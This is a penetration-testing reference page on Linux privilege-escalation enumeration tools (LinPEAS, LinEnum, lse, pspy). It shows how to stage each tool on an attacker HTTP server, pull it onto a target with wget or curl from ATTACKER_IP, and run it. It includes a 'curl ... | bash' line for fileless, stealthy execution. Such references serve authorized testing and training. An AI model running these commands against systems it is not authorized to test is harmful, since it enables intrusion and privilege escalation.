Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

LinPEAS

Most comprehensive Linux enumeration tool.

Download

https://github.com/peass-ng/PEASS-ng/releases

# Direct download
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh

Transfer to Target

# Attacker
python3 -m http.server 80

# Target
wget http://ATTACKER_IP/linpeas.sh
curl http://ATTACKER_IP/linpeas.sh -o linpeas.sh

Run

chmod +x linpeas.sh
./linpeas.sh

Run in Memory (No File on Disk)

curl http://ATTACKER_IP/linpeas.sh | bash

Save Output

./linpeas.sh | tee linpeas_output.txt

Specific Checks Only

./linpeas.sh -s        # Superfast (only critical checks)
./linpeas.sh -a        # All checks (slower)
./linpeas.sh -e /tmp   # Export files to /tmp

Color Legend

ColorMeaning
🔴 Red/Yellow95% chance of privesc vector
🔴 RedMust check immediately
🟡 YellowHigh probability
🟢 GreenUseful information
🔵 BlueInformational

LinEnum

Lighter alternative to LinPEAS.

Download

https://github.com/rebootuser/LinEnum

wget http://ATTACKER_IP/LinEnum.sh

Run

chmod +x LinEnum.sh
./LinEnum.sh

Thorough Mode

./LinEnum.sh -t

Export Report

./LinEnum.sh -r report -e /tmp -t

linux-smart-enumeration (lse)

Progressive verbosity — starts minimal, increases detail.

Download

https://github.com/diego-treitos/linux-smart-enumeration

wget http://ATTACKER_IP/lse.sh

Run

chmod +x lse.sh

# Level 0 — Only important findings
./lse.sh

# Level 1 — Interesting info
./lse.sh -l 1

# Level 2 — Everything
./lse.sh -l 2

pspy — Process Monitor

Not an enumeration tool, but critical for finding cron jobs and hidden processes.

Download

https://github.com/DominicBreuker/pspy/releases

# 64-bit
wget http://ATTACKER_IP/pspy64
# 32-bit
wget http://ATTACKER_IP/pspy32

Run

chmod +x pspy64
./pspy64
Watch for UID=0 processes — those run as root.

Quick Decision

ScenarioTool
Full enumeration, have timeLinPEAS (-a)
Quick check, limited timeLinPEAS (-s) or lse level 0
Need to find hidden cron/processespspy
Lighter alternativeLinEnum
Stealth (no file on disk)curl ... | bash